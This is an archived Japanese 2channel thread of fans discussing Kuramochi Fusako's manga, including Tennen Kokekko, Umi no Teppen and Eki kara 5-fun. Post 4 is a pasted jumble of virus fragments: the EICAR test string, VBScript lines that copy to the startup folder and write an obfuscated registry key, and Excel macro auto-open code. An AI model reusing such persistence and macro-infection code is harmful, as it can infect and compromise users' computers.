2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【天然コケッコー】くらもちふさこ11

1 :花と名無しさん:2007/09/29(土) 20:37:47 ID:n10CfvIz0
前スレ
くらもちふさこ 10
http://anime2.2ch.net/test/read.cgi/gcomic/1177300373/-100

過去ログ等は>>2

2 :花と名無しさん:2007/09/29(土) 20:41:59 ID:???0
くらもちふさこ/9
http://anime2.2ch.net/test/read.cgi/gcomic/1146235425/
くらもちふさこ/8
http://comic6.2ch.net/test/read.cgi/gcomic/1121212853/
【月のパルス】くらもちふさこ/7
http://comic6.2ch.net/test/read.cgi/gcomic/1098969206/
【天然】くらもちふさこ/6【漫画家】
ttp://comic6.2ch.net/test/read.cgi/gcomic/1076523741/
ttp://makimo.to/2ch/comic6_gcomic/1076/1076523741.html
くらもちふさこ その5
ttp://comic.2ch.net/test/read.cgi/gcomic/1058291143/
ttp://makimo.to/2ch/comic_gcomic/1058/1058291143.html
くらもちふさこ その4
ttp://comic.2ch.net/test/read.cgi/gcomic/1047981129/
ttp://makimo.to/2ch/comic_gcomic/1047/1047981129.html
くらもち ふさこ その3
ttp://comic.2ch.net/gcomic/kako/1023/10236/1023641481.html
くらもち ふさこ その2
ttp://comic.2ch.net/gcomic/kako/994/994662004.html
くらもち ふさこ
ttp://salad.2ch.net/gcomic/kako/964/964629977.html

3 :花と名無しさん:2007/09/29(土) 20:45:17 ID:???0
【060718:映画化】くらもちふさこ「天然コケッコー」映画化、夏帆初主演
http://anime2.2ch.net/test/read.cgi/comicnews/1153191141/

【行って】 天然コケッコー 2羽 【帰ります】
http://tv11.2ch.net/test/read.cgi/cinema/1187455609/

くらもちふさこインタビュー
http://books.yahoo.co.jp/interview/detail/31158943/01.html


くらもちふさこ応援ページ
ttp://www.geocities.co.jp/HeartLand/5228/kura.html
別冊くらもちふさこ
ttp://kuramochifusako.girly.jp/
石正美術館
ttp://fish.miracle.ne.jp/sekisho/

4 :花と名無しさん:2007/09/29(土) 23:23:12 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


5 :花と名無しさん:2007/09/30(日) 00:19:08 ID:???0
otz

6 :花と名無しさん:2007/09/30(日) 04:19:40 ID:5CnCB+mc0
映画見て気に入って原作を買おうと思ったけど、楽天ボックスでコミックス1巻が売り切れだった。
楽天ポイント今日までなのに。
文庫の1巻ならあるから、コミックスあきらめて文庫本にしよっかなあ…どうしよっかなあ…

7 :花と名無しさん:2007/09/30(日) 09:54:30 ID:???O
そうしろ

8 :花と名無しさん:2007/09/30(日) 10:10:38 ID:kIcBTYUa0
文庫で買い始めたら、巻数が違うからもうコミックスで他の巻を買うことできんからなあ。悩むなあ。

9 :6:2007/09/30(日) 16:20:21 ID:0mFA3XLj0
結局文庫を注文した。楽しみだ?.♪?

10 :花と名無しさん:2007/10/02(火) 17:44:35 ID:???0
文庫もいいけど
単行本のが大きいから好きなんだよね
あとカラーがいくつか載ってるのも嬉しい

11 :6:2007/10/02(火) 22:42:40 ID:sRYz5NJn0
れおだってできれば単行本が欲しかったのに orz
ファッキン楽天が1巻は売り切れって言うから orz
明日くらいに届くかな

12 :花と名無しさん:2007/10/03(水) 05:54:16 ID:???0
>>11
ごめんよ
文庫早くつくといいな

13 :花と名無しさん:2007/10/03(水) 09:26:58 ID:o+0FxnduO
中山手線が大好きだ
大人なとんがらしより好き
かながうらやましい

14 :花と名無しさん:2007/10/03(水) 21:04:30 ID:???O
天コケの無台詞の回、浩太朗がそよと大沢のキスを見てしまうシーン良いよねぇ。
思春期にあんなの見たら恋愛観変わるよ。
浩太朗は男前になりそうだ。

15 :6:2007/10/04(木) 22:25:38 ID:esl8/w9+0
おかしいな、昨日かおとといに楽天から天コケが届くはずなのに、まだ来ない。
実は楽円だったのかな!?

16 :花と名無しさん:2007/10/04(木) 22:50:30 ID:???0
円天だったんだね。

17 :花と名無しさん:2007/10/05(金) 11:08:47 ID:???O
浩太朗なあ。美人でしっかり者、性格も良い母と姉に囲まれて、女見る目厳しくならないかな。
さっちゃんといい感じになると言うくらもちさんの想定からいくと、逆に甘えん坊タイプに弱いのかも。

18 :花と名無しさん:2007/10/05(金) 11:39:04 ID:???O
甘えには弱そうだよね。
しかしカッちゃんとはいい感じにならないという想定だろうから、
ちょっとキツイ感じの子は苦手なんだろう。

19 :花と名無しさん:2007/10/05(金) 12:15:46 ID:???0
さっちゃんって最初は
ただの気の弱い子だと思ったけど
かっちゃんとの遣り取りみるに結構我が道いってて周りを焦らすタイプなんだな…と

コウタロウみたいな素直な子がひっかかりそう

20 :花と名無しさん:2007/10/05(金) 16:26:40 ID:???O
木村の末っ子だからね。
弟が出来たし、成長した姿は木村の子の中で一番変化がありそう。

21 :花と名無しさん:2007/10/05(金) 20:58:45 ID:???0
あれ?浩太郎って漫画家志望のあっちゃんとうまくいくんじゃないの??

22 :花と名無しさん:2007/10/05(金) 21:09:03 ID:???0
散歩道にさっちゃんとコウタロはくっつけたかった
という趣旨の作者の裏話があったんだよ

23 :花と名無しさん:2007/10/05(金) 21:24:50 ID:???O
ふたりが主役の続編を読んでみたいものですな。
成長した佐知子の性格付けが気になる。

24 :花と名無しさん:2007/10/06(土) 00:18:29 ID:???0
あ・・・あんな泣き虫が浩太郎ゲットするのか。
どんな女豹になるんだろう。

25 :花と名無しさん:2007/10/06(土) 11:11:09 ID:???0
おれも映画見て、気になって原作買った(ブックオフに全巻セットがあった)。
おしゃべり階段やいつもポケットにショパンをリアルタイムで読んでた世代だからね。
気になったのは、きむ中の連中の社交性のなさ。そよちゃんに感情移入しながら
物語見てるとあんまり気にならないかもしれないけど、彼女たち、友だちたくさん
作りたいとか、みんなと協力して何かを成し遂げようとか思わないのか(伊吹は高校に
入ってもまわりとうまくやっていたみたいだけど)。
おれは高校時代、あんなふうに仲間内で固まってるやつらみて「つまんねーやつ」
って思ってたよ。
そういう視点からすると、きむ中の連中が大沢を初めから好意的に迎えたことや、そよ
が遠山と友だちになってよろこぶシーンに、逆に違和感を感じるんだな。大沢を迎えた
ところは自分の土俵に来たのだからという解釈もできそうだけど。

あと、今さらなのかもしれないけど、そよが一人称で「わし」って言い始めるの2回目から
だな。「性格の良い大沢くん」では、「そよ」とか「わたし」って言ってる。

26 :花と名無しさん:2007/10/06(土) 12:39:48 ID:???0
くらもちさんの次の話がコーラスに載るのっていつかわかりますか?
来月号の予告には載ってないみたいだけど、また長く休むのかな??

27 :15:2007/10/06(土) 14:10:38 ID:uc6VMa530
>>16
あ、そうそうw
そう言おうとしたんだけど、ボケ方間違えたww そよもこういう間違いしそうだよなw

28 :花と名無しさん:2007/10/06(土) 14:47:08 ID:???0
http://www3.coara.or.jp/~chem/ist/tokitsu/tokitsukaze.html

29 :花と名無しさん:2007/10/06(土) 17:35:39 ID:???0
天コケにハマって過去の作品も読んでいるんだが、
アンコールが3回のラストがいまいち分かりづらかった
ようこのして欲しいことが漏れには分からなかったw
印象的な良いラストだとは思うが

30 :花と名無しさん:2007/10/06(土) 18:01:02 ID:???0
たった一人で授業を受けてる浩太郎を見てみたかった

31 :花と名無しさん:2007/10/06(土) 18:05:06 ID:???0
浩太郎、かわいそすぎ・・・

32 :花と名無しさん:2007/10/06(土) 18:14:19 ID:???0
>>29
もっかい最初から読み直してみるとわかるかもよ。
過去作品は「α」もいいよ。ちょっと高いけどそれだけの価値はある。

33 :花と名無しさん:2007/10/06(土) 18:17:24 ID:???0
αは天コケ以降だけどねー

34 :花と名無しさん:2007/10/06(土) 18:18:37 ID:???0
>>32
トン!
αはまだ未読です
今度読んでみるノシ
くらもちさんって結構名作書いていたんだな

35 :花と名無しさん:2007/10/06(土) 23:44:15 ID:???O
>>30
かっちゃんさっちゃんもひとり授業が待ち受けてんだよね…
ふたりは中学生・小学生でも同じ教室かもしれないけど。

36 :花と名無しさん:2007/10/07(日) 00:07:57 ID:???O
>>25
やけに村意識が強いあっちゃんはともかく、そよは友達欲しがってたと思う

クラスのほとんどが森中学だった子みたいだから、向こうはすでに友達がいてよほど姐御肌みたいな子がいないとわざわざ声掛けてこないだろう
木村組から行かないと友達作るのは難しいんだろうけど、子供は皆兄弟みたいな環境で育ったから、もともとグループが出来てるような場面での話しかけ方なんかがよくわからないんじゃ?

だから物怖じしない伊吹や東京育ちの大沢は割に馴染めたんじゃないかな


37 :花と名無しさん:2007/10/08(月) 22:18:35 ID:???0
人気あるんだから続編が読みたいなぁ

38 :花と名無しさん:2007/10/09(火) 19:08:51 ID:???O
くらもちさんの力量なら、続編やっても蛇足っぽくはならないと思うんだよね〜?
だめじゃろか?

39 :花と名無しさん:2007/10/09(火) 22:05:40 ID:???0
くらもちさんのカラー絵がまた良いんだよなぁ
それがあったから単行本買ったよ
散歩道も欲しい

40 :花と名無しさん:2007/10/09(火) 22:19:37 ID:???0
>>38
雑誌「H」に載ってたくらもちさんインタビューで
この前コーラスで描いた天コケの番外編について、
『描いていて「自分は本当にこの漫画の作者だったのだろうか」と思うほど
天コケの世界が分からなかった』とか言ってたよ。

本人を以てしてそうなんだから、やっぱり続編は別物になっちゃうと思う。

私としては、あの番外編は蛇足だったと思うから
このインタビュー読んで納得したのよね。



41 :花と名無しさん:2007/10/10(水) 01:17:20 ID:???O
ポッキーの男の子、大沢君っぽいなぁと思ってたら
映画で大沢君役してた子なんだね。

42 :花と名無しさん:2007/10/11(木) 00:05:30 ID:N1l5ZwXd0
イケメンさんCMに出とるん?

43 :花と名無しさん:2007/10/11(木) 00:07:17 ID:???0
でとるよ。すごいかっこいいよね。

44 :花と名無しさん:2007/10/12(金) 09:21:29 ID:???O
ひとり授業の心配してる住人カワユスww


>>34
>くらもちさんって結構名作書いていたんだな
にカチンときた私は立派な儲ということか

45 :花と名無しさん:2007/10/14(日) 09:34:33 ID:???0
遅レスですが、アンコールが3回のラストで瑤子が何を望んでいたかは
わかったけど、あのラストで本当に実現できたのかはよくわからなかった。

そもそも、ずっと瑤子案に反対していた不破君の心境の変化は社長の
もくろみを瑤子に知られたから?当初から離婚させようと思っていた、という。

46 :花と名無しさん:2007/10/14(日) 10:12:30 ID:???0
>45
いろいろな事を犠牲にしてやっとまた瑶子の担当になったかと思いきや、
武道館が終わったらまた担当替え・・・という会社側に
「社長を裏切るつもりはない」と言ってた不波にもかなりの葛藤があったんだと思う。
瑶子を愛してるから。

47 :花と名無しさん:2007/10/14(日) 12:23:45 ID:???0
不破君の「ようこ」と「瑶子」の使い分けにも注目。

48 :花と名無しさん:2007/10/14(日) 15:00:46 ID:9jEyJpWZ0
映画気に入って原作探してるんだが、店もネットも在庫無しで手に入らない orz

49 :花と名無しさん:2007/10/14(日) 15:38:40 ID:???0
>>48
今は中古しか無いだろうなぁ
ブクオフかマケプレは?

50 :花と名無しさん:2007/10/14(日) 18:45:00 ID:???0
駅から5分がやっと単行本で発売されますね(´∇`)

51 :花と名無しさん:2007/10/14(日) 19:18:09 ID:???O
>>50
mjd!!!!
嬉しい!ローラの話も少しくらい入るのかな?
はやく続きが読みたいよ…

52 :花と名無しさん:2007/10/14(日) 19:52:48 ID:???O
いつ出るの?記憶喪失の男の子の話が好きで単行本出たらまとめて読もうと思ってた。

53 :花と名無しさん:2007/10/14(日) 19:56:37 ID:???0
11月19日
『駅から5分』
同日に一条ゆかりのプライドと岩館真理子の見上げてごらんも出るよ

54 :花と名無しさん:2007/10/14(日) 22:10:07 ID:???0
やたー!待ってた。

55 :花と名無しさん:2007/10/14(日) 22:20:03 ID:???O
>>53
ありがとう

56 :花と名無しさん:2007/10/15(月) 22:13:01 ID:???O
映画の宣伝で気付いたんだけど
天然コケッコーって作品名だったんだ‥orz

いままでずっと天然コケコッk

57 :花と名無しさん:2007/10/16(火) 22:00:09 ID:???0
>>56
「いままで」って、連載当時からとか?w

58 :花と名無しさん:2007/10/16(火) 22:28:36 ID:WYOvEgLz0
おれはふざけてわざと「天然コケコッコ〜」って言ってるw

59 :花と名無しさん:2007/10/17(水) 00:34:03 ID:???0
コケッコーでこれなら、まだ『おばけ「だんご」』だと思ってる人は多いだろうな。

60 :花と名無しさん:2007/10/17(水) 01:26:36 ID:???0
>>59のギャグセンスで一日笑えそうだ・・・

61 :花と名無しさん:2007/10/17(水) 01:39:33 ID:???0
http://mantoruhakase-blog.bravehost.com/

62 :花と名無しさん:2007/10/17(水) 22:15:34 ID:???O
>>60
幸せだねぇ…

63 :花と名無しさん:2007/10/17(水) 22:26:51 ID:???O
他に笑うことないから

64 :花と名無しさん:2007/10/18(木) 21:35:03 ID:M7jXVrGf0
みんな人がいいなw
オレはかなり不愉快だったけど。そしてオレならこう言う。「この糞ガッ!!!」

65 :花と名無しさん:2007/10/19(金) 01:43:28 ID:o3/YBgCIO
私も最近コケッコーだと気付いた

66 :花と名無しさん:2007/10/19(金) 21:16:59 ID:???O
A-Girl初めて読んだんだけど面白かった。
夏目の女癖には呆れたけど。
自分は雑賀君派だわ。

67 :花と名無しさん:2007/10/20(土) 00:52:18 ID:???0
A-GIRLの、あのチャーハンみたいなの、食べたい…

68 :花と名無しさん:2007/10/20(土) 08:00:43 ID:???O
シソのピラフだっけ。
ほっぺたおちそうなアレだね。
おいしそうだよね。
レタスの八宝菜も食べたい…

夏目くんは結局これからもちゃらんぽらんなんだろうなー

69 :花と名無しさん:2007/10/21(日) 11:09:59 ID:???0
「駅から5分」の表紙、どんなのかね。
普通のカラーイラストだといいんだけど。
「月のパルス」の表紙は地味すぎだった。

70 :花と名無しさん:2007/10/21(日) 13:32:45 ID:???0
月のパルスの表紙
自分は凄く好き
シックな感じで
αと同じくらい好きだな

71 :花と名無しさん:2007/10/22(月) 15:02:07 ID:???0
いろはにこんぺいとを読んだ
1 アンコールが3回
2 東京のカサノバ
3 いろはにこんぺいと
4 天然コケッコー と順位が変動するぐらいよかった
あと残すはαだけなんだけど本屋であったためしがないよ…

72 :花と名無しさん:2007/10/22(月) 15:26:21 ID:???0
αはコミクスが大きいよ。
2冊でたぶん1500円以上になるからネットで買ってもいいかも。

73 :花と名無しさん:2007/10/22(月) 16:34:21 ID:???0
>>71
こんぺいとはあ・ま・い、っていう番外編もあるよ

74 :花と名無しさん:2007/10/22(月) 20:51:34 ID:???O
こんぺいと本当にいいよね。
初くらもちだったからかもしれないけど自分の中では一番。
小学生の頃読んだ時にはバンビが大嫌いだったなぁ。
懐かしい。

75 :花と名無しさん:2007/10/22(月) 22:13:31 ID:???0
バンビ?

76 :花と名無しさん:2007/10/22(月) 22:34:52 ID:???O
>>75
クンちゃんのライバル

77 :花と名無しさん:2007/10/22(月) 22:37:32 ID:???0
あーありがとう。思い出しました。あの可愛い子ね。
あれは嫌いだ。

78 :71:2007/10/23(火) 12:02:56 ID:???0
>>72>>73
情報dです
早速α注文しました かなり楽しみです

こんぺいとはあ・ま・いはクンちゃんの続編で手に入れにくそうですね
検索していたらそういえばおしゃべり階段も未読と気づきました
読むの楽しみです

79 :花と名無しさん:2007/10/23(火) 13:09:04 ID:???O
>>74
そういえば私もはじめて読んだ海の天辺がいちばん好きだ

80 :花と名無しさん:2007/10/25(木) 23:02:55 ID:???0
>>71
こんぺいとって、当時の大洋ホエールズの選手から名前とってんだけど、
最近初めて読んだ人で気付く人いるかな。

81 :花と名無しさん:2007/10/26(金) 04:28:00 ID:???0
チープスリルの3巻最後のほうで片瀬が店の場所聞いてきた手塚にハッとしてて
はじめ手塚を梅原と勘違いしてんのかと思ったんだけど
なんか教官て呼んでるし、なんなんだろう
なににハッとしてるのかなこれ

82 :花と名無しさん:2007/10/26(金) 06:41:23 ID:???0
通ってた教習所の教官だから驚いただけじゃないの。
入学したてで免許取ったようだし。


83 :花と名無しさん:2007/10/26(金) 18:50:15 ID:???0
>>82
見逃してたー本当だ免許取ったって言ってるね
教えてくれてありがとう

84 :花と名無しさん:2007/10/26(金) 19:04:02 ID:???0
来月発売の1月号から「駅から5分」シリーズ連載再開おめ!
予告の煽り「ある日、街中で偶然出会ったのは…」

85 :花と名無しさん:2007/10/28(日) 18:58:09 ID:???O
来月楽しみだよ〜本当に
予告カット、これはローラかなぁ…?
髪型はこんなもんだった気がするけど顔がよくわからない

86 :花と名無しさん:2007/11/01(木) 00:42:02 ID:PZvbGVDb0
天ケッコーの映画見て原作を欲しくなって、前に買おうとして円天いや楽天で在庫切れでずっと手に入らなかったんだが、やっと明日届くよ♪
楽しみだ♪

87 :花と名無しさん:2007/11/01(木) 01:53:33 ID:???O
新しい略し方だなぁ

88 :花と名無しさん:2007/11/01(木) 20:08:36 ID:AngR4Cl50
あまり出ませんが「海の天辺」も大好きです。

89 :花と名無しさん:2007/11/02(金) 15:36:21 ID:???0
海の天辺が一番好きって人はかな〜りいると思うよ

90 :花と名無しさん:2007/11/02(金) 16:58:15 ID:???O
うん。過去スレでも定期的に熱く語られているよね
変な男が湧いて議論しだすのも海の天辺が多い気がする

91 :花と名無しさん:2007/11/02(金) 16:58:41 ID:???0
少女漫画BEST3でもたびたび海の天辺見かけた



92 :花と名無しさん:2007/11/02(金) 17:20:17 ID:???0
と思ったら少なかった
皆さんくらもちBEST3はどうなりますか? とネタをふってみる


93 :花と名無しさん:2007/11/02(金) 18:54:02 ID:DqzqtoRH0
BEST1は海の天辺かな^^;
4巻って長さも、長すぎず短すぎずでいい。
何よりも、どの場面も印象的で無駄がないって、読み返すたびに思う。

その後は、読んでる気分で順位はコロコロ変わる。

94 :花と名無しさん:2007/11/03(土) 09:42:00 ID:???O
おいらはπr、ショパン、A女だな

キャラではとんがらしとポパイが好き
ビジュアル的には月のパルスのウタ月カップルに萌える

95 :花と名無しさん:2007/11/03(土) 09:59:14 ID:???0
月のパルスのウタと月ちゃん
ビジュアル良いよね
好きだ

96 :花と名無しさん:2007/11/03(土) 10:50:41 ID:???0
My Best3は「α」「チープスリル」「天コケ」
「α」のキリが好きだ。特に艦長役のキリがキリらしくなくて萌える。

97 :花と名無しさん:2007/11/05(月) 07:49:08 ID:WEf+e5jWO
コウタローが好き 1番成長したと感じるのはコウタロー(ビジュアル的に)



98 :花と名無しさん:2007/11/08(木) 02:26:16 ID:???0
ttp://www.sanin-chuo.co.jp/news/modules/news/article.php?storyid=445028006
山陰総合 : 畳ケ浦の「腰掛け岩」盗難

原作に出てくるか知らないですが、「天然コケッコーの散歩道」ではスケッチがあります。
そこで起こった事件です。


99 :花と名無しさん:2007/11/09(金) 16:43:49 ID:JqvNZfZ4O
そよちゃんの顔はどんどん気持ち悪い顔になっている…

魚類

100 :花と名無しさん:2007/11/10(土) 20:27:44 ID:???0
>>78
遅レスですが、「こんぺいと・は・あまい」は
「くらもちふさこ THE BEST 1」で読めますよ。
2004年刊なので、まだ入手できると思います。

101 :花と名無しさん:2007/11/10(土) 21:43:05 ID:uBVeofBZ0
>>99
だよね。
せめて画風は、なるべく作品ごとに統一してほしい。
別の作品で、魚類そよちゃんっぽいヒロインに出くわしても何とも思わないけど、
1巻と最終巻で激しく変わったりするのはイヤン。

102 :花と名無しさん:2007/11/10(土) 23:44:09 ID:???0
じ・・・・じえん?

103 :花と名無しさん:2007/11/11(日) 16:06:01 ID:7udZLk7U0
天然コケッコーの映画を見て、初めてくらもちふさこさんの漫画を買って読んだけど、密度が高いね
週間の漫画雑誌だったら隅から隅まで読んでも20分ぐらいで読んでしまうのに、天然コケッコーは1冊読み終えるのに1時間かかる
そのかわり、とても面白いね
他の作品も読んでみたくなったよ
ちなみに、1冊1時間は文庫本のほう

104 :花と名無しさん:2007/11/15(木) 07:52:36 ID:whBC1HWSO
ひとつ疑問に残る点がある。

バレンタインデーの時の話。浩太郎(小5)のときそよ(中1)が浩太の机にチョコを入れとき、浩太郎が中等部の教室にチョコのお礼を言いに行くという話があるが、なぜそよの後ろに制服をきったあっちゃんと伊吹ちゃんがいたのだろう。彼女達は小6のはず…

105 :花と名無しさん:2007/11/16(金) 11:54:48 ID:o8JXP5nu0
最近 「おしゃべり階段」「東京のカサノバ」「いろはにこんぺいと」
を久しぶりにちゃんと読んでみたら ほかのも読みたくなって
「海の天辺」を読みました。
話としては生徒&教師ものの中では好きな方になるけれど
シーナの年齢15歳を子持ち未亡人と付き合ってた先生が
恋愛対象になるあたりが 解せない。
設定を高校生にすると無理がでるのかなと思うのだけども。
先生はシーナのどこが好きになったんだろう? 
読み込みが甘くて(立ち読みなんで)だれか教えてください。 

106 :花と名無しさん:2007/11/16(金) 15:58:03 ID:???0
若くてぴちぴち元気な子が一直線に想いを寄せてくればクラっとなる方が男としては当たり前かと。

107 :花と名無しさん:2007/11/16(金) 16:09:26 ID:???0
あと、先生同士の付き合いっていろいろ難しいものがあるのかもしれない?
山崎先生、仮に河野と結婚しても仕事やめたくなさそうなきがするし。

過去スレでも話題になった気がするけど、山崎先生と河野先生の関係が惰性だったか
どうかはともかく、山崎先生としてはどこかで決着つけようと思っていたのかもしれない。

108 :花と名無しさん:2007/11/16(金) 21:09:13 ID:cNSwVoL20
はぁあぁん・・

109 :花と名無しさん:2007/11/16(金) 21:18:21 ID:/KA4wUEC0
山崎先生は 子持ちということで負い目があるとまでは
いわないけれど、河野先生の気持ちが
よそに向かっているのがわかったら 離れる覚悟があった
のだろうとは思う。

若くてぴちぴちかぁ..、20代ならそんなものなのかなあ。

110 :花と名無しさん:2007/11/16(金) 22:09:01 ID:hwm6fbSFO
普通に河野とシーナはキモいと思う

111 :花と名無しさん:2007/11/16(金) 23:36:56 ID:???0
シチュエーションだけ見るとキモいのに、
読後感がすばらしく良いのは何故だろう。
忘れた頃に天辺読み返す度、じーんとしてしまうのだが。

112 :花と名無しさん:2007/11/17(土) 02:22:26 ID:???0
二人の関係が深まっていくのを時間をかけてじっくり描いているからだと思う。
海の天辺って連載期間と物語内の時間がほぼ重なっているんだよね。
リアルタイムで読めた人がうらやましい。

113 :花と名無しさん:2007/11/17(土) 11:25:14 ID:???0
私は海の天辺が苦手。理性的に読んでしまうのかな。読後感もよくない。

山崎先生は河野の気持ちがシーナに向かったから離れたのではないと思う。
どの位長く付き合っていたのかわからないけれど、その間河野はあの家庭科の
先生にも迫られていたわけだし。

114 :花と名無しさん:2007/11/17(土) 11:33:35 ID:???0
山崎先生が合鍵をシーナに渡したのは、シーナになら河野を取られてもいいと
思ったから?普通自分の学校の生徒にああいうことしないと思ったけど、山崎
先生にとってもシーナは格別だったということか。

引越連絡のハガキも、恋人にああいうハガキ出すかなと思った。

115 :花と名無しさん:2007/11/17(土) 19:29:46 ID:???0
山崎先生の存在は、椎名と河野がくっつく上で必要な存在だっと思うよ。

河野と山崎が付き合っていた事で、
河野はロリコン趣味で椎名に引かれた訳ではないという説明がつくし。

中学生と教師の恋愛物な訳で、下手に描いたら只の変態教師になるし。
海の天辺連載前にくらもちさんも色々悩んだってインタビューで言ってたけど。

116 :花と名無しさん:2007/11/17(土) 20:02:21 ID:???0
駅から5分の1巻
姫がケータイが鳴ったらお友達になりましょうっていうep5までだった
描きおろしなし。最後に花染の人物関係の表だったよ


117 :花と名無しさん:2007/11/17(土) 20:06:24 ID:???0
>>116
もう出てるんですね!楽しみ。
雑誌掲載分をみてないから、姫がどうとかよくわからないけど
早く月曜になって欲しい。

118 :花と名無しさん:2007/11/19(月) 21:07:51 ID:???O
駅から5分 get!

119 :花と名無しさん:2007/11/20(火) 00:44:55 ID:???O
駅から5分一巻読み終えた。面白かった
続きが楽しみです

120 :花と名無しさん:2007/11/20(火) 08:31:53 ID:???O
二巻が出るのはいつになるかなぁ…
やっと連載再開うれしい!
この間の天コケは単行本どうなるんだろ?

121 :花と名無しさん:2007/11/20(火) 11:46:44 ID:3ZqtNxsE0
くらもちさんの作品読んだこと無かったけど、駅から5分
少しだけ読みましたが面白そうですね。

122 :花と名無しさん:2007/11/20(火) 13:10:53 ID:???O
駅から5分、今読み終りました〜
面白い!!続きが楽しみです
海の天辺を読んでからくらもちさんのファンなんですが、どの作品も大好きです。
何度読み返しても面白いからすごい。

123 :花と名無しさん:2007/11/20(火) 18:04:23 ID:???O
天コケ
チープスリル
おばけたんご
駅から5分

読みました
チープスリル辺りの絵線が綺麗ですね
くらもちさんの作品あまり分からないんだがそこらへんの絵の作品他にありますか?

124 :花と名無しさん:2007/11/20(火) 18:13:40 ID:???0
私もチープスリル、おばけたんごあたりの絵が一番好き。
くらもちさんにGペン禁止令出したいくらいだ。

125 :花と名無しさん:2007/11/20(火) 22:38:01 ID:???0
駅から5分、読み終わった。すんごい面白い!!
くらもちさんの力量は全く衰えないどころか、進化し続けてますね。


126 :花と名無しさん:2007/11/20(火) 23:13:23 ID:AA+Jq2ZX0
いつまでたってもおもしろい。
本当にすごい。
絵が変わるもの楽しい。

最近また自分の好きなかんじの絵になってきてうれしい。
天コケ特別編の絵もよかったなぁ。
そよちゃんかわいかった。

127 :花と名無しさん:2007/11/20(火) 23:43:19 ID:???O
教習所に通っていると、チープスリルが読みたくなってきたけど、手元にない。
手塚さんがかっこ良くて好きだった。

128 :花と名無しさん:2007/11/21(水) 13:42:01 ID:???0
連載開始時には円城さんだったのが圓城に変わってる。

129 :花と名無しさん:2007/11/21(水) 14:09:42 ID:5r/Mh9Bv0
この物語は不思議な話なんですか?

130 :花と名無しさん:2007/11/21(水) 14:16:22 ID:???0
単行本で変えたのではなく、前回の登場人物紹介でも旧字なんですね。


131 :花と名無しさん:2007/11/23(金) 00:12:17 ID:???0
>>123
海の天辺、千花ちゃんちはふつう、タイムテーブルあたりかな。

あと、αとか天コケ以降の漫画は、アップの絵ではファンでも好き嫌いが分かれるところがあるけど
ちょっとカメラ引いて全身が入ってるコマは文句なしに美しいです。

132 :花と名無しさん:2007/11/23(金) 00:57:03 ID:???0
駅から5分の第1話って、意味がよく分からないんだけど。
単語カードを読み上げていって、最後が窓で、
そっからなんで、「沢田君の気持ちを受け取れた」とか、
「僕は君を好きだった」とかっていう結論に至るんだ?

133 :花と名無しさん:2007/11/23(金) 03:33:49 ID:???0
窓際が藤巻さんの席だからじゃないの。
窓が終点でなく振り向いてから「こっちかゴールは」って言ってるし。

134 :花と名無しさん:2007/11/23(金) 10:06:23 ID:???O
ゴールは「窓」じゃないんだよ〜

135 :花と名無しさん:2007/11/23(金) 11:57:24 ID:???0
自分で作った単語カードから自分が何を考えていたかを掴もうとしていたってこと
でしょ。彼女の方も最初は「何故私?」と疑ってたのが、とにかく私だったとわかり
気持ちを受け取れた、と。

136 :花と名無しさん:2007/11/24(土) 01:30:46 ID:???0
>>134
単語カードのゴールは「窓」だったじゃん。

137 :花と名無しさん:2007/11/24(土) 15:58:25 ID:???0
これの意味がわからなければ愛も(再び?)生まれなかったんだから
沢田君がちゃんと読み取れる子でよかったw

138 :花と名無しさん:2007/11/25(日) 17:36:19 ID:???O
>>136
単語カードの最後がFujimaki's deskだったらバレバレになるだろ

139 :花と名無しさん:2007/11/25(日) 17:44:13 ID:???0
何でそこに引っ掛かるんだろうね。
理解できないラストでもないと思うけど。

140 :花と名無しさん:2007/11/25(日) 18:15:59 ID:???O
自分は藤巻さんと沢田くんの話大好きだ。コンビニで立ち読みした時泣きそうになった。昨日単行本買ってきて読み返してもジーンときた。けど意味が分からないっていう人もいるのか。

141 :花と名無しさん:2007/11/25(日) 19:31:30 ID:???O
正直これくらいで理解できない人って普段どんな漫画読んでんの?

142 :花と名無しさん:2007/11/25(日) 19:37:22 ID:???0
なんでそんな刺々しいレスをするかな

それはさておき、藤巻さんは、沢田が事故って記憶喪失になって
ちょっと王子っぽい外見になってなかったら
別れ切り出してたのに、なんかなんだかなあと思った。

143 :花と名無しさん:2007/11/25(日) 19:56:34 ID:???O
そうじゃなくて告白されてからやっぱ気になりだしてて、んで記憶喪失で自分に告白したことも忘れて他の女の子と仲良くしてていろいろ考えてしまったんだと思うけど。
告白されて気になりだすとか最後の単語が窓とか、中学生らしい感覚だと自分は思うけどなあ。

144 :花と名無しさん:2007/11/25(日) 21:04:51 ID:???O
初めて好きって言ってくれた人が他の子と仲良くしてるなんて嫌だよね。
しかしタンツボさんが同じクラスにいるのに二人付き合っていくならこれからが大変そう。

145 :花と名無しさん:2007/11/25(日) 21:14:40 ID:???0
>>143
いや、それはわかってるんだけど・・ま、いいや。

146 :花と名無しさん:2007/11/25(日) 21:39:21 ID:???O
>>145
記憶喪失にならなかったら、ってこと?それはそうだね。
昔の沢田くんの方が好きだな。ずっとキャラが変わったままなのかな。

147 :花と名無しさん:2007/11/25(日) 21:56:51 ID:???0
episode.4のつまらなさは残念。野生子みたいな30代の女がもっと出るといい。

148 :花と名無しさん:2007/11/25(日) 22:39:44 ID:???O
ローラの話は続くの?なら藤巻沢田や野生子メインの話もまた描いて欲しい。

149 :花と名無しさん:2007/11/25(日) 23:37:30 ID:???O
